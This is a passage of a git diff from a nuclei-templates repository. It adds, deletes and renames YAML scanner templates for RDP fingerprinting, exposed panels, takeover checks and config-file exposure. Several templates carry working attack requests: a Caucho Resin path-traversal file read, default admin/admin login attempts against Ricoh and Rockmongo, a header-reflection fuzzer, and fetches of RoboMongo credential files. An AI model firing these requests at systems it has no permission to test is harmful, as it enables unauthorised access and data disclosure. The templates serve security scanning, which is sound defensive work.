"0300000b06d00000123400" + - type: word + encoding: hex + name: win2003 + words: + - "030000130ed000001234000300080002000000" + - type: word + encoding: hex + name: win2008 + words: + - "030000130ed000001234000200080002000000" + - type: word + encoding: hex + name: win7or2008R2 + words: + - "030000130ed000001234000209080002000000" + - type: word + encoding: hex + name: win2008R2DC + words: + - "030000130ed000001234000201080002000000" + - type: word + encoding: hex + name: win10 + words: + - "030000130ed00000123400021f080002000000" + - type: word + encoding: hex + name: win2012R2OR8 + words: + - "030000130ed00000123400020f080002000000" + - type: word + encoding: hex + name: win2012R2 + words: + - "030000130ed00000123400020f080008000000" + - type: word + encoding: hex + name: win2016 + words: + - "030000130ed00000123400021f080008000000" diff --git a/nuclei-templates/Other/rdp-detect.yaml b/nuclei-templates/Other/rdp-detect.yaml deleted file mode 100644 index 5e5ae9c240..0000000000 --- a/nuclei-templates/Other/rdp-detect.yaml +++ /dev/null @@ -1,55 +0,0 @@ -id: rdp-detect -info: - name: Windows RDP Detection - author: princechaddha - severity: info - tags: windows,rdp,network -network: - - inputs: - - data: "0300002a25e00000000000436f6f6b69653a206d737473686173683d746573740d0a010008000b000000" - type: hex - read-size: 2048 - host: - - "{{Hostname}}" - - "{{Host}}:3389" - matchers: - - type: word - encoding: hex - name: win2000 - words: - - "0300000b06d00000123400" - - type: word - encoding: hex - name: win2003 - words: - - "030000130ed000001234000300080002000000" - - type: word - encoding: hex - name: win2008 - words: - - "030000130ed000001234000200080002000000" - - type: word - encoding: hex - name: win7or2008R2 - words: - - "030000130ed000001234000209080002000000" - - type: word - encoding: hex - name: win2008R2DC - words: - - "030000130ed000001234000201080002000000" - - type: word - encoding: hex - name: win10 - words: - - "030000130ed00000123400021f080002000000" - - type: word - encoding: hex - name: win2012R2OR8 - words: - - "030000130ed00000123400020f080002000000" - - type: word - encoding: hex - name: win2016 - words: - - "030000130ed00000123400021f080008000000" diff --git a/nuclei-templates/Other/readme-takeover-9842.yaml b/nuclei-templates/Other/readme-takeover-9842.yaml new file mode 100644 index 0000000000..f105be275a --- /dev/null +++ b/nuclei-templates/Other/readme-takeover-9842.yaml @@ -0,0 +1,15 @@ +id: readme-takeover +info: + name: readme takeover detection + author: pdcommunity + severity: high + tags: takeover + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers: + - type: word + words: + - Project doesnt exist... yet! diff --git a/nuclei-templates/Other/readme-takeover-9843.yaml b/nuclei-templates/Other/readme-takeover-9843.yaml deleted file mode 100644 index 3062e6f898..0000000000 --- a/nuclei-templates/Other/readme-takeover-9843.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: readme-takeover -info: - name: readme takeover detection - author: pdteam - severity: high - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - 'Project doesnt exist... yet!' diff --git a/nuclei-templates/Other/readthedocs-takeover-9844.yaml b/nuclei-templates/Other/readthedocs-takeover.yaml similarity index 100% rename from nuclei-templates/Other/readthedocs-takeover-9844.yaml rename to nuclei-templates/Other/readthedocs-takeover.yaml diff --git a/nuclei-templates/Other/redmine-cli-detect-9854.yaml b/nuclei-templates/Other/redmine-cli-detect-9854.yaml deleted file mode 100644 index ba7f5a1b5b..0000000000 --- a/nuclei-templates/Other/redmine-cli-detect-9854.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: redmine-cli-detect -info: - name: Detect Redmine CLI Configuration File - author: geeknik - description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ - severity: info - tags: tech,redmine -requests: - - method: GET - path: - - "{{BaseURL}}/.redmine-cli" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "default" - - "my_id" - - "root_url" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/redmine-cli-detect-9855.yaml b/nuclei-templates/Other/redmine-cli-detect-9855.yaml new file mode 100644 index 0000000000..aa81c8dc72 --- /dev/null +++ b/nuclei-templates/Other/redmine-cli-detect-9855.yaml @@ -0,0 +1,22 @@ +id: redmine-cli-detect +info: + name: Detect Redmine CLI Configuration File + author: geeknik + description: A small command-line utility to interact with Redmine - https://pypi.org/project/Redmine-CLI/ + severity: info +requests: + - method: GET + path: + - "{{BaseURL}}/.redmine-cli" + matchers-condition: and + matchers: + - type: word + part: body + words: + - default + - my_id + - root_url + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/reflected-headers.yaml b/nuclei-templates/Other/reflected-headers.yaml deleted file mode 100644 index dd648bcf76..0000000000 --- a/nuclei-templates/Other/reflected-headers.yaml +++ /dev/null @@ -1,39 +0,0 @@ -id: reflected-parameters - -info: - name: Reflected Parameters - author: shelled - severity: info - tags: xss,rxss - -variables: - first: "shelled" - -requests: - - method: GET - path: - - "{{BaseURL}}" - - payloads: - reflection: - - "shelled" - - fuzzing: - - part: query - type: postfix - mode: single - fuzz: - - "{{reflection}}" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - "{{reflection}}" - - - type: word - part: header - words: - - "text/html" diff --git a/nuclei-templates/Other/reflected-params.yaml b/nuclei-templates/Other/reflected-params.yaml new file mode 100644 index 0000000000..7db29d89be --- /dev/null +++ b/nuclei-templates/Other/reflected-params.yaml @@ -0,0 +1,354 @@ +id: reflected-parameters + +info: + name: Reflected Parameters + author: shelled + severity: info + tags: xss,cache + +variables: + first: "shelled" + +requests: + - raw: + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Referer: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept-Charset: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept-Datetime: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept-Encoding: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Accept-Language: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Authorization: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Cache-Control: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Connection: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Length: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-MD5: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Cookie: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Date: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Expect: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Forwarded: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + From: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + If-Match: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + If-Modified-Since: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + If-None-Match: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + If-Range: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + If-Unmodified-Since: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Max-Forwards: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Pragma: {{reflection}} + Proxy-Authorization: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Range: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Referer: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + TE: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Upgrade: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + User-Agent: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Via: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Warning: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + DNT: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Front-End-Https: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Proxy-Connection: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-IP-Address: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-IP-Port: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-HTTP-Method: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Date: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-User-Agent: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Referer: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Accept: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Accept-Charset: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Accept-Encoding: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Accept-Language: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-GEO-Location: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + PSU-Device-ID: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-ATT-DeviceId: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-CSRFToken: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Correlation-ID: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Csrf-Token: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-XSRF-TOKEN: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Do-Not-Track: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-For: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-Host: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Forwarded-Proto: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Http-Method-Override: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-ProxyUser-Ip: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Request-ID: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Requested-With: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-UIDH: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-Wap-Profile: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + X-XSRF-TOKEN: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Client-IP: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + True-Client-IP: {{reflection}} + + - | + GET {{BaseURL}} HTTP/1.1 + Host: {{Hostname}} + Cluster-Client-IP: {{reflection}} + + payloads: + reflection: + - "shelled" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "{{reflection}}" + + - type: word + part: header + words: + - "text/html" diff --git a/nuclei-templates/Other/ref.yaml b/nuclei-templates/Other/reflector.yaml similarity index 100% rename from nuclei-templates/Other/ref.yaml rename to nuclei-templates/Other/reflector.yaml diff --git a/nuclei-templates/Other/remote-ui-login-9859.yaml b/nuclei-templates/Other/remote-ui-login-9859.yaml new file mode 100644 index 0000000000..d869206a4d --- /dev/null +++ b/nuclei-templates/Other/remote-ui-login-9859.yaml @@ -0,0 +1,20 @@ +id: remote-ui-login +info: + name: Remote UI Login + author: dhiyaneshDK + severity: info + reference: + - https://www.exploit-db.com/ghdb/6815 + tags: panel +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + matchers-condition: and + matchers: + - type: word + words: + - 'System Manager ID:' + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/remote-ui-login.yaml b/nuclei-templates/Other/remote-ui-login.yaml deleted file mode 100644 index 096ee181a2..0000000000 --- a/nuclei-templates/Other/remote-ui-login.yaml +++ /dev/null @@ -1,19 +0,0 @@ -id: remote-ui-login -info: - name: Remote UI Login - author: dhiyaneshDK - severity: info - reference: https://www.exploit-db.com/ghdb/6815 - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}/login.html' - matchers-condition: and - matchers: - - type: word - words: - - 'System Manager ID:' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/repetier-unauth.yaml b/nuclei-templates/Other/repetier-unauth.yaml new file mode 100644 index 0000000000..6307bd0498 --- /dev/null +++ b/nuclei-templates/Other/repetier-unauth.yaml @@ -0,0 +1,39 @@ +id: repetier-unauth + +info: + name: Repetier Server Dashboard - Unauthenticated + author: ritikchaddha + severity: high + description: | + Repetier Server Dashboard has been exposed. + classification: + cpe: cpe:2.3:a:repetier-server:repetier-server:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: repetier-server + product: repetier-server + shodan-query: title:"Repetier-Server" + fofa-query: title="repetier-server" + tags: repetier,dashboard,unauth,misconfig + +http: + - method: GET + path: + - "{{BaseURL}}/#!/printer/Prusa_I3/print" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Global Settings' + - 'Edit Profile' + - 'Logout' + - 'Clear all Messages' + condition: and + + - type: status + status: + - 200 +# digest: 490a0046304402205819f5c52118748c051b0a084a9f914f22be45d4305f75994a9f40e7c29906cc02201a99709aa9e921b49411fddda46d2aa681861c95c44c7be8d866c024072dadaf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/Other/request-based-interaction-9862.yaml b/nuclei-templates/Other/request-based-interaction-9863.yaml similarity index 100% rename from nuclei-templates/Other/request-based-interaction-9862.yaml rename to nuclei-templates/Other/request-based-interaction-9863.yaml diff --git a/nuclei-templates/Other/cnnvd-200705-315-1035.yaml b/nuclei-templates/Other/resin-cnnvd-200705-315-9865.yaml similarity index 100% rename from nuclei-templates/Other/cnnvd-200705-315-1035.yaml rename to nuclei-templates/Other/resin-cnnvd-200705-315-9865.yaml diff --git a/nuclei-templates/Other/resin-inputfile-fileread-9868.yaml b/nuclei-templates/Other/resin-inputfile-fileread-9868.yaml new file mode 100644 index 0000000000..edcb505271 --- /dev/null +++ b/nuclei-templates/Other/resin-inputfile-fileread-9868.yaml @@ -0,0 +1,22 @@ +id: resin-inputfile-fileread +info: + name: Caucho Resin LFR + author: princechaddha + severity: high + description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. + reference: + - https://blkstone.github.io/2017/10/30/resin-attack-vectors/ + tags: resin,caucho,lfr +requests: + - method: GET + path: + - "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %" + part: body diff --git a/nuclei-templates/Other/resin-inputfile-fileread-9870.yaml b/nuclei-templates/Other/resin-inputfile-fileread-9870.yaml deleted file mode 100644 index 3cbde92574..0000000000 --- a/nuclei-templates/Other/resin-inputfile-fileread-9870.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: resin-inputfile-fileread -info: - name: Caucho Resin LFR - author: princechaddha - severity: high - description: A vulnerability in Caucho Resin allows remote unauthenticated users to utilize the 'inputFile' variable to include the content of locally stored files and disclose their content. - tags: resin,caucho,lfr - reference: https://blkstone.github.io/2017/10/30/resin-attack-vectors/ -requests: - - method: GET - path: - - "{{BaseURL}}/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=../../../../../index.jsp" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "%@ page session=\"false\" import=\"com.caucho.vfs.*, com.caucho.server.webapp.*\" %" - part: body diff --git a/nuclei-templates/Other/resin-viewfile-lfr-9872.yaml b/nuclei-templates/Other/resin-viewfile-lfr-9874.yaml similarity index 100% rename from nuclei-templates/Other/resin-viewfile-lfr-9872.yaml rename to nuclei-templates/Other/resin-viewfile-lfr-9874.yaml diff --git a/nuclei-templates/Other/revivenews.yaml b/nuclei-templates/Other/revivenews.yaml new file mode 100644 index 0000000000..8097c31e4d --- /dev/null +++ b/nuclei-templates/Other/revivenews.yaml @@ -0,0 +1,59 @@ +id: revivenews + +info: + name: > + ReviveNews <= 1.0.2 - Missing Authorization via revivenews_install_and_activate_plugins() + author: topscoder + severity: high + description: > + + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/19db591b-1e59-4ff7-b339-bea869083bbc?source=api-scan + classification: + cvss-metrics: + cvss-score: + cve-id: + metadata: + fofa-query: "wp-content/themes/revivenews/" + google-query: inurl:"/wp-content/themes/revivenews/" + shodan-query: 'vuln:' + tags: cve,wordpress,wp-theme,revivenews,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/revivenews/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "revivenews" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.2') \ No newline at end of file diff --git a/nuclei-templates/Other/ricoh-weak-password-9883.yaml b/nuclei-templates/Other/ricoh-weak-password-9883.yaml deleted file mode 100644 index 8e21ee4482..0000000000 --- a/nuclei-templates/Other/ricoh-weak-password-9883.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: ricoh-weak-password - -info: - name: Ricoh Weak Password - author: gy741 - severity: high - tags: ricoh,default-login - reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ - -requests: - - raw: - - | - POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 - Host: {{Hostname}} - Cookie: cookieOnOffChecker=on; - - wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open= - - payloads: - username: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - type: regex - regex: - - 'wimsesid=[0-9]+' - part: header - - - type: status - status: - - 302 diff --git a/nuclei-templates/Other/ricoh-weak-password.yaml b/nuclei-templates/Other/ricoh-weak-password.yaml new file mode 100644 index 0000000000..3a9d60d1c9 --- /dev/null +++ b/nuclei-templates/Other/ricoh-weak-password.yaml @@ -0,0 +1,28 @@ +id: ricoh-weak-password +info: + name: Ricoh Weak Password + author: gy741 + severity: high + tags: ricoh,default-login + reference: https://ricoh-printer.co/default-username-and-password-for-ricoh-web-image-monitor/ +requests: + - raw: + - | + POST /web/guest/tw/websys/webArch/login.cgi HTTP/1.1 + Host: {{Hostname}} + Cookie: cookieOnOffChecker=on; + + wimToken=&userid_work=&userid={{base64(username)}}&password_work=&password=&open= + payloads: + username: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: regex + regex: + - 'wimsesid=[0-9]+' + part: header + - type: status + status: + - 302 diff --git a/nuclei-templates/Other/robomongo-credential-9885.yaml b/nuclei-templates/Other/robomongo-credential-9885.yaml deleted file mode 100644 index 39ba75b96f..0000000000 --- a/nuclei-templates/Other/robomongo-credential-9885.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: robomongo-credential - -info: - name: MongoDB credential disclosure - author: geeknik - description: MongoDB credentials file used by RoboMongo - severity: high - tags: mongodb,robomongo,disclosure,config - -requests: - - method: GET - path: - - "{{BaseURL}}/db/robomongo.json" - - "{{BaseURL}}/robomongo.json" - - matchers-condition: and - matchers: - - type: word - part: header - words: - - "application/json" - - - type: word - words: - - "databaseName" - - "userName" - - "userPassword" - - "serverHost" - condition: and - - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/robomongo-credential.yaml b/nuclei-templates/Other/robomongo-credential.yaml new file mode 100644 index 0000000000..55c4010bdb --- /dev/null +++ b/nuclei-templates/Other/robomongo-credential.yaml @@ -0,0 +1,28 @@ +id: robomongo-credential +info: + name: MongoDB credential disclosure + author: geeknik + description: MongoDB credentials file used by RoboMongo + severity: high + tags: mongodb,robomongo,disclosure,config +requests: + - method: GET + path: + - "{{BaseURL}}/db/robomongo.json" + - "{{BaseURL}}/robomongo.json" + matchers-condition: and + matchers: + - type: word + part: header + words: + - "application/json" + - type: word + words: + - "databaseName" + - "userName" + - "userPassword" + - "serverHost" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/robots-9891.yaml b/nuclei-templates/Other/robots-9891.yaml deleted file mode 100644 index f11e795855..0000000000 --- a/nuclei-templates/Other/robots-9891.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: robots-txt -info: - name: robots.txt file - author: CasperGN - severity: info - tags: misc,generic - -requests: - - method: GET - path: - - "{{BaseURL}}/robots.txt" - matchers-condition: and - redirects: true - matchers: - - type: word - words: - - "Disallow:" - - - type: word - words: - - text/plain - part: header - - - type: dsl - dsl: - - "len(body)>=140 && status_code==200" diff --git a/nuclei-templates/Other/robots-txt-9886.yaml b/nuclei-templates/Other/robots-txt-9886.yaml new file mode 100644 index 0000000000..c5a92a1318 --- /dev/null +++ b/nuclei-templates/Other/robots-txt-9886.yaml @@ -0,0 +1,28 @@ +id: robots-txt + +info: + name: robots.txt file + author: CasperGN + severity: info + tags: misc,generic + +requests: + - method: GET + path: + - "{{BaseURL}}/robots.txt" + + matchers-condition: and + redirects: true + matchers: + - type: word + words: + - "Disallow:" + + - type: word + part: header + words: + - text/plain + + - type: dsl + dsl: + - "len(body)>=140 && status_code==200" diff --git a/nuclei-templates/Other/rocketmq-console-exposure-9894.yaml b/nuclei-templates/Other/rocketmq-console-exposure-9894.yaml deleted file mode 100644 index c82ab918f7..0000000000 --- a/nuclei-templates/Other/rocketmq-console-exposure-9894.yaml +++ /dev/null @@ -1,14 +0,0 @@ -id: rocketmq-console-exposure -info: - name: Apache RocketMQ Console Exposure - author: pdteam - severity: info - tags: panel -requests: - - method: GET - path: - - '{{BaseURL}}' - matchers: - - type: word - words: - - "RocketMq-console-ng" diff --git a/nuclei-templates/Other/rocketmq-console-exposure.yaml b/nuclei-templates/Other/rocketmq-console-exposure.yaml new file mode 100644 index 0000000000..dd94951756 --- /dev/null +++ b/nuclei-templates/Other/rocketmq-console-exposure.yaml @@ -0,0 +1,14 @@ +id: rocketmq-console-exposure +info: + name: Apache RocketMQ Console Exposure + author: pdteam + severity: info + tags: panel,apache +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - "RocketMq-console-ng" diff --git a/nuclei-templates/Other/rockmongo-default-login-9897.yaml b/nuclei-templates/Other/rockmongo-default-login-9897.yaml deleted file mode 100644 index 8fb0fdf1ee..0000000000 --- a/nuclei-templates/Other/rockmongo-default-login-9897.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: rockmongo-default-login - -info: - name: Rockmongo Default Login - author: pikpikcu - severity: high - tags: rockmongo,default-login - -requests: - - raw: - - | - POST /index.php?action=login.index HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/x-www-form-urlencoded - Referer: {{Hostname}}/index.php?action=login.index - - more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 - - payloads: - username: - - admin - password: - - admin - attack: pitchfork - - matchers-condition: and - matchers: - - - type: word - words: - - "Location: /index.php?action=admin.index&host=0" - - "Set-Cookie: ROCK_LANG=" - part: header - - - type: status - status: - - 302 diff --git a/nuclei-templates/Other/rockmongo-default-login-9900.yaml b/nuclei-templates/Other/rockmongo-default-login-9900.yaml new file mode 100644 index 0000000000..d1164252a3 --- /dev/null +++ b/nuclei-templates/Other/rockmongo-default-login-9900.yaml @@ -0,0 +1,41 @@ +id: rockmongo-default-login +info: + name: Rockmongo Default Login + author: pikpikcu + severity: high + description: Rockmongo default admin credentials were discovered. + tags: rockmongo,default-login + reference: + - https://serverfault.com/questions/331315/how-to-change-the-default-admin-username-and-admin-password-in-rockmongo + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cve-id: + cwe-id: CWE-522 +requests: + - raw: + - | + POST /index.php?action=login.index HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + Referer: {{Hostname}}/index.php?action=login.index + + more=0&host=0&username={{username}}&password={{password}}&db=&lang=en_us&expire=3 + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers-condition: and + matchers: + - type: word + words: + - "Location: /index.php?action=admin.index&host=0" + - "Set-Cookie: ROCK_LANG=" + part: header + - type: status + status: + - 302 + +# Enhanced by mp on 2022/03/11 diff --git a/nuclei-templates/Other/rockmongo-xss.yaml b/nuclei-templates/Other/rockmongo-xss.yaml index 98ee1d9506..b34f840ff6 100644 --- a/nuclei-templates/Other/rockmongo-xss.yaml +++ b/nuclei-templates/Other/rockmongo-xss.yaml @@ -3,6 +3,7 @@ info: name: RockMongo V1.1.8 XSS author: pikpikcu severity: medium + description: A vulnerability in RockMongo allows attackers to inject arbitrary javascript into the response returned by the application. reference: https://packetstormsecurity.com/files/136658/RockMongo-1.1.8-Cross-Site-Request-Forgery-Cross-Site-Scripting.html tags: rockmongo,xss requests: diff --git a/nuclei-templates/Other/roundcube-log-disclosure-9905.yaml b/nuclei-templates/Other/roundcube-log-disclosure-9907.yaml similarity index 100% rename from nuclei-templates/Other/roundcube-log-disclosure-9905.yaml rename to nuclei-templates/Other/roundcube-log-disclosure-9907.yaml diff --git a/nuclei-templates/Other/routeros-login-9909.yaml b/nuclei-templates/Other/routeros-login-9908.yaml similarity index 100% rename from nuclei-templates/Other/routeros-login-9909.yaml rename to nuclei-templates/Other/routeros-login-9908.yaml diff --git a/nuclei-templates/Other/rsa-self-service-9910.yaml b/nuclei-templates/Other/rsa-self-service-9910.yaml deleted file mode 100644 index 79e9b036e7..0000000000 --- a/nuclei-templates/Other/rsa-self-service-9910.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: rsa-self-service -info: - name: Detect RSA Self-Service Panel - author: PR3R00T - severity: info - tags: panel,rsa -requests: - - method: GET - path: - - "{{BaseURL}}/console-selfservice/SelfService.do" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Self-Service Console" - - "RSA" - - "AM_Self_Service_Console" - - "console-selfservice" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/rsa-self-service.yaml b/nuclei-templates/Other/rsa-self-service.yaml new file mode 100644 index 0000000000..35e60db85a --- /dev/null +++ b/nuclei-templates/Other/rsa-self-service.yaml @@ -0,0 +1,23 @@ +id: rsa-self-service +info: + name: Detect RSA Self-Service Panel + author: PR3R00T + severity: info + tags: panel +requests: + - method: GET + path: + - "{{BaseURL}}/console-selfservice/SelfService.do" + matchers-condition: and + matchers: + - type: word + part: body + words: + - "Self-Service Console" + - "RSA" + - "AM_Self_Service_Console" + - "console-selfservice" + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/rseenet-default-login-9913.yaml b/nuclei-templates/Other/rseenet-default-login-9914.yaml similarity index 100% rename from nuclei-templates/Other/rseenet-default-login-9913.yaml rename to nuclei-templates/Other/rseenet-default-login-9914.yaml diff --git a/nuclei-templates/Other/rseenet-detect-9916.yaml b/nuclei-templates/Other/rseenet-detect-9916.yaml new file mode 100644 index 0000000000..eaf79c0258 --- /dev/null +++ b/nuclei-templates/Other/rseenet-detect-9916.yaml @@ -0,0 +1,27 @@ +id: rseenet-detect + +info: + name: Advantech R-SeeNet Detection + author: pdteam + severity: info + reference: https://icr.advantech.cz/products/software/r-seenet + metadata: + shodan-query: http.title:"R-SeeNet" + tags: tech,rseenet + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: regex + part: body + regex: + - 'R-SeeNet (.*)' + + extractors: + - type: regex + group: 1 + regex: + - 'R-SeeNet (.*)' diff --git a/nuclei-templates/Other/rseenet-detect.yaml b/nuclei-templates/Other/rseenet-detect.yaml deleted file mode 100644 index a18280dc21..0000000000 --- a/nuclei-templates/Other/rseenet-detect.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: rseenet-detect -info: - name: Advantech R-SeeNet Detection - author: pdteam - severity: info - reference: https://icr.advantech.cz/products/software/r-seenet - metadata: - shodan-query: http.title:"R-SeeNet" - tags: tech,rseenet -requests: 